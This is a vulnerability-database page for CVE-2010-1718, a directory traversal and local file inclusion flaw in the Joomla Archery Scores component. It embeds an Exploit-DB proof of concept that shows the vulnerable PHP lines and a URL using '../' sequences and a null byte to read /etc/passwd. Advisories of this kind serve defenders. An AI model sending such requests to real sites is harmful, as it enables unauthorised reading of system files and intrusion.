CVE-2010-1718

medium
Published 2010-05-04 ยท Modified 2026-04-29
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
7.8

Description

Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-12282 webapps php verified text ยท 1 KB
wishnusakti + inc0mp13te ยท 2010-04-18

Joomla! Component Archery Scores 1.0.6 - Local File Inclusion

text exploit Source: Exploit-DB
 ================================================================================================

 Title    : Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability
 Vendor   : http://lispeltuut.org/
 Download : http://lispeltuut.org/archery-scores/download

 Date     : Sunday, 18 April 2010 - GMT +07:00 Jakarta, Indonesia
 Author   : wishnusakti + inc0mp13te (HH)
 Contact  : evileyes60117[at]yahoo.com

 ================================================================================================

 [+] Vulnerable

     ./components/com_archeryscores/archeryscores.php

     Line 22: if($controller = JRequest::getVar('controller')) {
     Line 23:	require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
     Line 24: }

 [+] Exploit

     http://[site]/[path]/index.php?option=com_archeryscores&controller=[LFI]

 [+] PoC

     http://localhost/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00

 ================================================================================================

 Greetz to:

     Penghuni #nob0dy priv8 Server
     (ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, madonk, & Botยฒ Scan :D)
     en Semua Komunitas Hacking Tanah Air
     Peace Yo :)

 ================================================================================================

# ./wishnusakti

Application impact

VendorProductVersionsFixed
lispeltuutcom_archeryscores1.0.6
joomla joomlajoomla\!

References

CWEs

CWE-22

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.